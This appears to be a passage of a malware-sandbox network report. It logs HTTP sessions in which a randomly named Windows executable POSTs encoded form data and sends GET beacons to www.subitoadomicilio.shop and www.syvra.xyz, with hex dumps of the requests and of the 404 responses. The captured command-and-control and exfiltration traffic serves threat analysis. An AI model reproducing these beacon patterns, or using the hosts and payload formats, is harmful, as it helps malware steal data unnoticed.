                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 [TRUNCATED]
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.449739195.24.68.25805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:40:23.504281044 CEST783OUTPOST /x7sd/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.subitoadomicilio.shop
                    Origin: http://www.subitoadomicilio.shop
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.subitoadomicilio.shop/x7sd/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 7a 4b 2f 43 59 75 6c 4b 33 65 6c 4e 36 49 2f 56 67 56 6d 4f 71 63 35 6d 76 44 66 5a 43 69 37 72 65 54 4e 54 6b 77 58 4c 75 4c 61 4b 37 53 51 65 72 4e 53 68 6a 36 6b 50 61 46 5a 71 78 6c 36 57 34 57 63 32 6e 61 6b 38 6d 35 44 42 31 62 54 7a 48 65 4e 6a 76 48 74 54 64 69 74 2b 32 6c 52 47 44 72 6f 66 47 73 56 65 4e 58 59 68 56 45 66 55 75 6b 46 4b 69 47 4f 41 4c 4c 45 67 35 6f 65 48 33 43 6a 79 36 6e 79 70 4d 31 34 4f 55 50 39 39 2b 78 48 33 46 79 76 71 7a 61 44 38 75 45 50 2f 31 64 6a 4b 73 54 47 47 6c 4b 72 70 39 4d 48 6e 72 35 69 72 70 6a 67 6f 51 70 6a 73 6f 44 4e 4f 34 54 71 69 32 62 45 4e 64 4b 43 47 58 56 38 4f 4e 57 48 41 68 38 3d
                    Data Ascii: 6X=8zK/CYulK3elN6I/VgVmOqc5mvDfZCi7reTNTkwXLuLaK7SQerNShj6kPaFZqxl6W4Wc2nak8m5DB1bTzHeNjvHtTdit+2lRGDrofGsVeNXYhVEfUukFKiGOALLEg5oeH3Cjy6nypM14OUP99+xH3FyvqzaD8uEP/1djKsTGGlKrp9MHnr5irpjgoQpjsoDNO4Tqi2bENdKCGXV8ONWHAh8=
                    Sep 22, 2024 17:40:24.215229034 CEST591INHTTP/1.1 404 Not Found
                    Server: openresty
                    Date: Sun, 22 Sep 2024 15:40:24 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Content-Length: 424
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 [TRUNCATED]
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.449740195.24.68.25805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:40:26.042485952 CEST10865OUTPOST /x7sd/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.subitoadomicilio.shop
                    Origin: http://www.subitoadomicilio.shop
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.subitoadomicilio.shop/x7sd/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 7a 4b 2f 43 59 75 6c 4b 33 65 6c 4e 36 49 2f 56 67 56 6d 4f 71 63 35 6d 76 44 66 5a 43 69 37 72 65 54 4e 54 6b 77 58 4c 75 44 61 4a 49 71 51 66 4d 78 53 67 6a 36 6b 52 71 46 63 71 78 6c 33 57 34 75 44 32 6e 57 53 38 6b 52 44 44 58 44 54 37 56 6d 4e 70 76 48 74 63 39 69 57 36 32 6c 45 47 44 37 73 66 43 41 56 65 4e 58 59 68 55 30 66 44 76 6b 46 48 43 47 50 46 37 4c 79 6b 35 6f 36 48 33 4b 56 79 36 53 4a 70 38 56 34 4f 77 72 39 2f 4c 6c 48 2f 46 79 70 72 7a 61 68 38 75 4a 58 2f 31 41 53 4b 76 50 2f 47 6e 57 72 6b 71 78 52 36 6f 68 75 2f 36 4f 7a 7a 41 63 48 72 61 62 59 44 36 62 4f 6a 6d 32 64 4f 50 32 70 4b 51 38 45 62 4d 43 78 43 6c 4e 4d 6f 56 72 31 71 4d 66 4a 47 49 64 6f 6e 31 78 57 6a 6c 2b 78 64 75 45 4f 6e 4d 2b 62 6c 66 74 62 39 50 6f 69 2b 49 75 52 4b 5a 51 41 65 79 4b 50 38 69 44 2f 41 6a 47 31 42 6b 43 61 31 6b 6c 57 6e 35 51 36 6c 47 4e 33 6f 43 69 69 33 69 64 65 51 75 51 39 4f 53 49 38 73 55 6a 4b 57 33 38 53 57 53 50 39 6c 76 34 75 49 4c 66 2b 69 4b 4b 50 6f 48 32 37 36 66 55 [TRUNCATED]
                    Data Ascii: 6X=8zK/CYulK3elN6I/VgVmOqc5mvDfZCi7reTNTkwXLuDaJIqQfMxSgj6kRqFcqxl3W4uD2nWS8kRDDXDT7VmNpvHtc9iW62lEGD7sfCAVeNXYhU0fDvkFHCGPF7Lyk5o6H3KVy6SJp8V4Owr9/LlH/Fyprzah8uJX/1ASKvP/GnWrkqxR6ohu/6OzzAcHrabYD6bOjm2dOP2pKQ8EbMCxClNMoVr1qMfJGIdon1xWjl+xduEOnM+blftb9Poi+IuRKZQAeyKP8iD/AjG1BkCa1klWn5Q6lGN3oCii3ideQuQ9OSI8sUjKW38SWSP9lv4uILf+iKKPoH276fU3H1EFiMrkp5igrHlX83ab3TBNc9dQ+S+MNm1uuzkLDBoiOOPORzyQ1FVoQg9GUSSKC6ACns98Ea6i4JFuC9gT9KvAFMVuGTTYTIkRcb3RI0na8jPWRdNyHBRsrQJxiNNsBjtKQNftHq4nPmR9oXTgUHDndGlqkS5+cen21u22GII66Wf3lyIc9Osa1MXQsj9PgB6/jZo8/1v433gS3D8UcG7yDexsop8YBeeGaGIokykPPwP4H0MX/Eu6NN01+489WZGV3OORAhn+lCNw8sBvRyNHLVU4GylUjG5wAWz7ymgGE0bHFvD66qn3AUvDV7U6hOG0gAUzKkvQAaL5HeWu6gxJJY7+xq8v3lRvKWD/01egtUp33vWh5TtT4rGqY6Dy/1SoeLdjXsmf1SI4xD6gE9heHRqXZpbnmg7VgDgks+BqIe+9XkZxtH/+GZt1xRA8iaLmZKL54LjUr28KwCi0tvSk7Nh7XiLV9q6YJeS9tGMa2iVWpNaACGuzWgAZSPTVR7GpQkNfqrkfZ8SUmu8cDg/AstypCPhR4I3TUDXLBRruP9hDbxkvLMTnzAgZzJkpRf7Lcw8chWxuTTfqMR58Uf+6ZqKIpNcEbKeOeZoI3+wcGq4m/jP308AGn1+cT9XZN7cXnCctin7e20fGjaxyEX6vQInqih8A2 [TRUNCATED]
                    Sep 22, 2024 17:40:26.891362906 CEST591INHTTP/1.1 404 Not Found
                    Server: openresty
                    Date: Sun, 22 Sep 2024 15:40:26 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Content-Length: 424
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 [TRUNCATED]
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.449741195.24.68.25805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:40:28.588864088 CEST491OUTGET /x7sd/?6X=xxifBtz+TGalALhNcyBTN44Pt4/Sbh2VoP/cWgYTPpbNJICDVfxFhRGjE7kr1iNtdvbH3kOKnhtRMn3Y82SlrP3cRd6my2NsPT3JF2gfd9Xq5l5DKuckTiI=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.subitoadomicilio.shop
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:40:29.297085047 CEST591INHTTP/1.1 404 Not Found
                    Server: openresty
                    Date: Sun, 22 Sep 2024 15:40:29 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Content-Length: 424
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 [TRUNCATED]
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.449742162.0.213.94805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:40:34.508917093 CEST727OUTPOST /h2bb/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.syvra.xyz
                    Origin: http://www.syvra.xyz
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.syvra.xyz/h2bb/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 6e 4c 69 33 68 6b 36 4c 73 57 47 71 35 47 68 77 38 57 34 4d 35 6a 56 4b 68 34 74 76 69 6f 69 6f 70 4f 39 43 7a 4f 73 53 5a 42 78 71 4f 72 79 63 47 4d 69 59 31 42 31 64 30 30 49 36 48 66 56 4b 68 30 37 4c 79 67 75 79 4a 56 4d 78 6a 61 64 75 61 78 65 79 73 6c 43 6a 56 73 43 7a 77 61 76 4f 55 33 31 78 69 4d 33 72 6b 73 41 32 59 48 70 68 66 77 39 64 53 46 77 51 70 7a 31 62 72 54 6f 63 53 36 54 51 58 6f 39 51 57 5a 33 68 6d 48 55 4c 47 44 54 73 49 77 42 47 70 71 6a 47 73 65 38 66 5a 36 63 78 68 42 34 4b 4f 70 4e 47 58 30 55 70 58 2f 76 53 6f 6e 68 4d 39 48 2f 73 4d 66 6e 2b 4d 77 3d 3d
                    Data Ascii: 6X=nLi3hk6LsWGq5Ghw8W4M5jVKh4tvioiopO9CzOsSZBxqOrycGMiY1B1d00I6HfVKh07LyguyJVMxjaduaxeyslCjVsCzwavOU31xiM3rksA2YHphfw9dSFwQpz1brTocS6TQXo9QWZ3hmHULGDTsIwBGpqjGse8fZ6cxhB4KOpNGX0UpX/vSonhM9H/sMfn+Mw==
                    Sep 22, 2024 17:40:35.188148022 CEST1236INHTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:40:35 GMT
                    Server: Apache
                    X-Frame-Options: SAMEORIGIN
                    Content-Length: 16052
                    X-XSS-Protection: 1; mode=block
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                    Sep 22, 2024 17:40:35.188220978 CEST1236INData Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67
                    Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.015068
                    Sep 22, 2024 17:40:35.188256979 CEST1236INData Raw: 2c 2d 33 2e 36 37 32 33 38 36 20 2d 31 2e 30 37 34 38 33 38 2c 2d 39 2e 37 36 30 36 35 37 20 2d 30 2e 33 36 31 38 35 2c 2d 37 2e 35 36 34 37 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d
                    Data Ascii: ,-3.672386 -1.074838,-9.760657 -0.36185,-7.564779 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393p
                    Sep 22, 2024 17:40:35.188291073 CEST672INData Raw: 33 35 35 33 33 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 39 2e 38 39 39 34 39 35 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20
                    Data Ascii: 355339" height="9.8994951" width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlim
                    Sep 22, 2024 17:40:35.188328028 CEST1236INData Raw: 33 34 33 34 38 39 2c 33 30 2e 32 34 36 37 33 20 39 2e 37 36 30 31 33 32 2c 34 38 2e 36 36 33 34 39 20 34 2e 34 31 36 36 34 32 2c 31 38 2e 34 31 36 37 36 20 39 2e 37 39 38 33 35 36 2c 33 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33
                    Data Ascii: 343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <p
                    Sep 22, 2024 17:40:35.188364029 CEST1236INData Raw: 36 34 20 2d 31 2e 31 36 36 34 34 2c 31 39 2e 32 34 39 32 31 20 2d 33 2e 33 35 30 32 2c 33 31 2e 32 34 36 31 39 20 2d 32 2e 31 38 33 37 36 2c 31 31 2e 39 39 36 39 38 20 2d 34 2e 38 31 36 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33
                    Data Ascii: 64 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:but
                    Sep 22, 2024 17:40:35.188397884 CEST1236INData Raw: 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65
                    Data Ascii: e;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4537" d="m 87.0625,123.03748 c 2.916637,10.42937 5.833458,20.8594 7.291964,26.66356 1.458505,5.
                    Sep 22, 2024 17:40:35.188429117 CEST104INData Raw: 2e 31 37 32 38 32 20 2d 37 2e 34 30 32 38 33 2c 33 31 2e 34 31 36 36 35 20 2d 32 2e 31 38 37 38 34 37 2c 31 30 2e 32 34 33 38 34 20 2d 33 2e 39 35 35 34 30 37 2c 32 30 2e 31 34 32 31 38 20 2d 35 2e 30 37 34 39 37 35 2c 32 36 2e 30 33 34 38 33 20
                    Data Ascii: .17282 -7.40283,31.41665 -2.187847,10.24384 -3.955407,20.14218 -5.074975,26.03483 -1.119568,5.89264 -1.5
                    Sep 22, 2024 17:40:35.188462019 CEST1236INData Raw: 39 30 39 32 2c 37 2e 37 37 38 30 35 20 2d 31 2e 38 38 35 37 30 38 2c 31 30 2e 30 37 37 30 36 20 2d 30 2e 32 39 34 37 38 39 2c 32 2e 32 39 39 30 31 20 2d 30 2e 34 31 32 35 36 37 2c 35 2e 30 30 37 39 20 35 2e 31 65 2d 35 2c 31 37 2e 35 36 33 33 39
                    Data Ascii: 9092,7.77805 -1.885708,10.07706 -0.294789,2.29901 -0.412567,5.0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke
                    Sep 22, 2024 17:40:35.188499928 CEST224INData Raw: 2e 33 35 38 32 36 2c 2d 30 2e 31 37 36 37 32 20 36 2e 34 32 33 33 2c 2d 30 2e 31 37 36 37 32 20 39 2e 34 38 37 30 32 2c 2d 30 2e 35 38 39 32 32 20 33 2e 30 36 33 37 32 2c 2d 30 2e 34 31 32 35 31 20 36 2e 31 32 38 38 35 2c 2d 31 2e 32 33 37 37 34
                    Data Ascii: .35826,-0.17672 6.4233,-0.17672 9.48702,-0.58922 3.06372,-0.41251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;strok
                    Sep 22, 2024 17:40:35.193464994 CEST1236INData Raw: 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 36 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 2e 31
                    Data Ascii: e-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;st


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.449743162.0.213.94805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:40:37.057132959 CEST747OUTPOST /h2bb/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.syvra.xyz
                    Origin: http://www.syvra.xyz
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.syvra.xyz/h2bb/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
